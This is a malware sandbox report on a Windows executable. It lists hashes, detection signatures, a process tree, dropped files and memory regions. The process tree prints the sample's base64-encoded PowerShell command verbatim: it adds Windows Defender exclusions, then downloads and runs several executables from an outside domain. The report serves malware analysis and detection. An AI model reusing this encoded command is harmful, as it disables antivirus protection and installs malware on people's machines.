Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    16s
  • max time network
    29s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • submitted
    06/04/2024, 01:01

General

  • Target

    026855ec0e8786cfb946a1c5f858190afc566b6f14d310fe37780c0ebe1e8608.exe

  • Size

    2.4MB

  • MD5

    f5ae4fdb7579db408cc119c7df5ba699

  • SHA1

    7119c29754409ab879eae0548c3c24395c27e16e

  • SHA256

    026855ec0e8786cfb946a1c5f858190afc566b6f14d310fe37780c0ebe1e8608

  • SHA512

    445d2a66100af7a1b7f85e8cb0f6c06af0ae436d514d818c102f81ffa4e92984353f0635d1aa7121e832efda642d4843e0d87e84819144dd356c9ffe99bcfb5f

  • SSDEEP

    49152:MajGm3M0mm2dUE5qMsS5SeBtvGz68gNR0T3vRs+1FXclTbVzi:Maj1vmm0fsSQm8OA3vRLbclTbVW

Malware Config

Signatures

  • Detects executables manipulated with Fody 2 IoCs
  • Detects executables packed with unregistered version of .NET Reactor 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file 2 IoCs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\026855ec0e8786cfb946a1c5f858190afc566b6f14d310fe37780c0ebe1e8608.exe
    "C:\Users\Admin\AppData\Local\Temp\026855ec0e8786cfb946a1c5f858190afc566b6f14d310fe37780c0ebe1e8608.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4380
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAYQBjACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdAB4AHgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcQBjAGoAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcwBwAGwAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBDAE0ATABpAHQAZQBJAG4AcwB0AGEAbABsAGUAcgAuAGUAeABlACcALAAgADwAIwBuAGgAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHcAZgBnACMAPgAgAC0AUABhAHQAaAAgACgAJABwAHcAZAApAC4AcABhAHQAaAAgADwAIwB5AGUAcAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBDAE0ATABpAHQAZQBJAG4AcwB0AGEAbABsAGUAcgAuAGUAeABlACcAKQApADwAIwBqAGIAegAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAG8AbwBrAHIAZQBhAGQAaQBuAGcAMgAwADIANAAuAG4AZQB0AC8AcgBlAG0AbwB0AGUALwBjAG0ASAB5AHAAZQByAHMAdQByAHIAbwBnAGEAdABlAHMAYQB2AGUAcwBEAGgAYwBwAC4AZQB4AGUAJwAsACAAPAAjAGQAagB1ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQB3AGYAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAagBqAHUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYwBtAEgAeQBwAGUAcgBzAHUAcgByAG8AZwBhAHQAZQBzAGEAdgBlAHMARABoAGMAcAAuAGUAeABlACcAKQApADwAIwBpAHkAZwAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAG8AbwBrAHIAZQBhAGQAaQBuAGcAMgAwADIANAAuAG4AZQB0AC8AbQAvAGMAbwBuAGgAbwBzAHQAZwBtAC4AZQB4AGUAJwAsACAAPAAjAG0AYQBlACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbQB6AHEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAeQB4AG0AIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYwBvAG4AaABvAHMAdABnAG0ALgBlAHgAZQAnACkAKQA8ACMAYQBxAGcAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAegBmAGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACgAJABwAHcAZAApAC4AcABhAHQAaAAgADwAIwBhAGcAagAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBDAE0ATABpAHQAZQBJAG4AcwB0AGEAbABsAGUAcgAuAGUAeABlACcAKQA8ACMAaABwAGMAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYwBoAHYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHgAeABzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGMAbQBIAHkAcABlAHIAcwB1AHIAcgBvAGcAYQB0AGUAcwBhAHYAZQBzAEQAaABjAHAALgBlAHgAZQAnACkAPAAjAHQAZABlACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGYAawB5ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB6AGcAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBjAG8AbgBoAG8AcwB0AGcAbQAuAGUAeABlACcAKQA8ACMAYQBuAHYAIwA+AA=="
      2⤵
      • Blocklisted process makes network request
      • Downloads MZ/PE file
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:216
      • C:\Users\Admin\AppData\Local\Temp\CMLiteInstaller.exe
        "C:\Users\Admin\AppData\Local\Temp\CMLiteInstaller.exe"
        3⤵
        • Executes dropped EXE
        • Enumerates system info in registry
        PID:4548
      • C:\Users\Admin\AppData\Roaming\cmHypersurrogatesavesDhcp.exe
        "C:\Users\Admin\AppData\Roaming\cmHypersurrogatesavesDhcp.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1004
        • C:\Users\Admin\AppData\Roaming\.cmHypersurrogatesavesDhcp.exe
          "C:\Users\Admin\AppData\Roaming\.cmHypersurrogatesavesDhcp.exe"
          4⤵
            PID:2652
        • C:\Users\Admin\AppData\Roaming\conhostgm.exe
          "C:\Users\Admin\AppData\Roaming\conhostgm.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3724
          • C:\Users\Admin\AppData\Roaming\.conhostgm.exe
            "C:\Users\Admin\AppData\Roaming\.conhostgm.exe"
            4⤵
            • Executes dropped EXE
            PID:3316

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\CMLiteInstaller.exe

      Filesize

      977KB

      MD5

      02ea34533272f916fb52990a45917913

      SHA1

      bd68a7c84b7d7a65ab19419ddf6a2a2b44fda0a4

      SHA256

      6dd45a770648da5f5996ac7b28f604493b44f8b1ba7458cf60d3a1ab7cf18590

      SHA512

      352521214ed922b0e3331559d0c6b2af0fc55e4b4077dcf83dbeec08a8f59820c98bbbd795cdd8e2430c835ba7fbb6b19c34572762c7cf6359de05b99ef019a7

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fti5v5fm.yd0.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Roaming\.cmHypersurrogatesavesDhcp.exe

      Filesize

      16.2MB

      MD5

      6655d3087c95093aaa1721d7fc388102

      SHA1

      5b967293e7effe8df0e1c1576f1166e39caa9168

      SHA256

      15c5858d9ebda747923f9017a9cc85ce8113ba908c2ae9964c358fbb7085497b

      SHA512

      d3560470248811af98e8085d790ad31ce0939664b599c80072cea9db57cf1910955536276fe1787ecf6013ebadc13182f309f66912d01b6c0871a445c5b842b2

    • C:\Users\Admin\AppData\Roaming\.conhostgm.exe

      Filesize

      4.1MB

      MD5

      17be4c3e660d6790cf257ac1d37cfed3

      SHA1

      5a9acd6a791ec8f51bd73ea21681da17ad63e41a

      SHA256

      a57d4b57cdbed3d466f435129dc227625cba8a6238bab88f78cf8583ea2f0afb

      SHA512

      45896bf23c82d666352857f71c9b32efa85468191bf719bf6a98c11ae239bccc244de6ac104e68f2a8fa32c96ee847baa311d99ea1b89af41505d626bcd0c302

    • C:\Users\Admin\AppData\Roaming\.conhostgm.exe

      Filesize

      19.2MB

      MD5

      dd212c880a5fd073da1ce9cc30fda639

      SHA1

      fe6683154f4ca80dbe8ace46db23b3163ee13fc0

      SHA256

      cc2fef68eab401d44c89733fe57a11543ef93c7f3805da3e2de5f0249d7bf8d4

      SHA512

      73a390e6151bdf6b5b2f637dc0c7dd5e6f5cd0bc4e988ecc4a17c49509fbaa6157341ad7d2eb8e2b54d1fc91ca2b03d11c16490e3d0420ea9c54c50de6d55fc5

    • C:\Users\Admin\AppData\Roaming\cmHypersurrogatesavesDhcp.exe

      Filesize

      2.7MB

      MD5

      a019ace077ac382ccb8d83b19540926e

      SHA1

      f113d7549d85855bec628c2e626c340f5380bd12

      SHA256

      bb6075bd1a836e5ed1c92e1d0b10a2414509e5f634a33f502313bcf82ee498ae

      SHA512

      7a1bbffe2f6938399840e56c305ef3c3f03182cb1eef3555ad63699f43f749ceb8def18e8124cd3f8382c51a02ba2cc9960089287b05c85b9f0a0ff7b7b94618

    • C:\Users\Admin\AppData\Roaming\conhostgm.exe

      Filesize

      2.9MB

      MD5

      316fa77cc45d0802155448d648b417b4

      SHA1

      c60be59c3df582030f3bbbf7c93e3f6110a38c82

      SHA256

      dd248b4df3e5b9eac86bbe9fc6f7ef17b0d75738b601267b214a825783d0a2a1

      SHA512

      4f1a4b71bc0d18dd6210c7b55736e2c43cf90f7ed700061a775ceecade3ef2b88c0e122769c5570e5bb2b8453deab6d5ff50ab73ff0fbb1cb9b3475be76c4da9

    • memory/216-54-0x0000000008DC0000-0x0000000009364000-memory.dmp

      Filesize

      5.6MB

    • memory/216-46-0x0000000007BC0000-0x0000000007BCA000-memory.dmp

      Filesize

      40KB

    • memory/216-13-0x0000000005990000-0x0000000005FB8000-memory.dmp

      Filesize

      6.2MB

    • memory/216-87-0x0000000074BD0000-0x0000000075380000-memory.dmp

      Filesize

      7.7MB

    • memory/216-11-0x0000000005350000-0x0000000005360000-memory.dmp

      Filesize

      64KB

    • memory/216-8-0x0000000074BD0000-0x0000000075380000-memory.dmp

      Filesize

      7.7MB

    • memory/216-14-0x0000000005870000-0x0000000005892000-memory.dmp

      Filesize

      136KB

    • memory/216-15-0x0000000006170000-0x00000000061D6000-memory.dmp

      Filesize

      408KB

    • memory/216-21-0x00000000061E0000-0x0000000006246000-memory.dmp

      Filesize

      408KB

    • memory/216-7-0x0000000005250000-0x0000000005286000-memory.dmp

      Filesize

      216KB

    • memory/216-26-0x0000000006350000-0x00000000066A4000-memory.dmp

      Filesize

      3.3MB

    • memory/216-27-0x0000000006810000-0x000000000682E000-memory.dmp

      Filesize

      120KB

    • memory/216-28-0x0000000006840000-0x000000000688C000-memory.dmp

      Filesize

      304KB

    • memory/216-29-0x000000007F2E0000-0x000000007F2F0000-memory.dmp

      Filesize

      64KB

    • memory/216-31-0x00000000711D0000-0x000000007121C000-memory.dmp

      Filesize

      304KB

    • memory/216-30-0x0000000006DE0000-0x0000000006E12000-memory.dmp

      Filesize

      200KB

    • memory/216-42-0x00000000077D0000-0x00000000077EE000-memory.dmp

      Filesize

      120KB

    • memory/216-41-0x0000000005350000-0x0000000005360000-memory.dmp

      Filesize

      64KB

    • memory/216-43-0x0000000007800000-0x00000000078A3000-memory.dmp

      Filesize

      652KB

    • memory/216-44-0x0000000008190000-0x000000000880A000-memory.dmp

      Filesize

      6.5MB

    • memory/216-45-0x0000000007B50000-0x0000000007B6A000-memory.dmp

      Filesize

      104KB

    • memory/216-10-0x0000000005350000-0x0000000005360000-memory.dmp

      Filesize

      64KB

    • memory/216-47-0x0000000007E10000-0x0000000007EA6000-memory.dmp

      Filesize

      600KB

    • memory/216-48-0x0000000007D40000-0x0000000007D51000-memory.dmp

      Filesize

      68KB

    • memory/216-49-0x0000000007D80000-0x0000000007D8E000-memory.dmp

      Filesize

      56KB

    • memory/216-50-0x0000000007D90000-0x0000000007DA4000-memory.dmp

      Filesize

      80KB

    • memory/216-51-0x0000000007DD0000-0x0000000007DEA000-memory.dmp

      Filesize

      104KB

    • memory/216-52-0x0000000007DC0000-0x0000000007DC8000-memory.dmp

      Filesize

      32KB

    • memory/216-53-0x0000000007EE0000-0x0000000007F02000-memory.dmp

      Filesize

      136KB

    • memory/4380-12-0x0000000074BD0000-0x0000000075380000-memory.dmp

      Filesize

      7.7MB

    • memory/4380-9-0x000000007F8A0000-0x000000007FC71000-memory.dmp

      Filesize

      3.8MB

    • memory/4380-6-0x0000000000C00000-0x00000000015BA000-memory.dmp

      Filesize

      9.7MB

    • memory/4380-4-0x0000000000C00000-0x00000000015BA000-memory.dmp

      Filesize

      9.7MB

    • memory/4380-1-0x000000007F8A0000-0x000000007FC71000-memory.dmp

      Filesize

      3.8MB

    • memory/4380-2-0x0000000074BD0000-0x0000000075380000-memory.dmp

      Filesize

      7.7MB

    • memory/4380-0-0x0000000000C00000-0x00000000015BA000-memory.dmp

      Filesize

      9.7MB

    • memory/4380-3-0x0000000000C00000-0x00000000015BA000-memory.dmp

      Filesize

      9.7MB

    • memory/4548-84-0x00000205A2AB0000-0x00000205A2CA6000-memory.dmp

      Filesize

      2.0MB

    • memory/4548-89-0x0000020588850000-0x0000020588860000-memory.dmp

      Filesize

      64KB

    • memory/4548-86-0x0000020588850000-0x0000020588860000-memory.dmp

      Filesize

      64KB

    • memory/4548-85-0x00007FFAA5F90000-0x00007FFAA6A51000-memory.dmp

      Filesize

      10.8MB

    • memory/4548-78-0x0000020588230000-0x0000020588328000-memory.dmp

      Filesize

      992KB